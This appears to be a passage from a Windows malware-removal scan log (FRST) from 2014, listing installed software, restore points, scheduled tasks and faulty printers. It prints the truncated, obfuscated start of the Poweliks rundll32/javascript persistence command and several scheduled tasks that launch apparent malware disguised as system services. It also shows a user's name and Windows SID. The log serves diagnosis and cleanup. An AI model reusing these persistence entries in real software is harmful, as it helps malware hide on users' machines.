Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden
CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden
ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden
ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)
Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)
Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)
Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden
DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)
Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)
GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)
iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)
iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)
Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden
MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)
Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)
ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden
Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden
Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden
SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)
SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)
SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden
Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (Version: 2007.0731.2234.38497 - ATI) Hidden
SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)
TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)
WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft 6to4 Adapter #2
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet 1022n
Description: HP LaserJet 1022n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6940 series
Description: Deskjet 6940 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: hp LaserJet 2420
Description: hp LaserJet 2420
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet CP1025nw
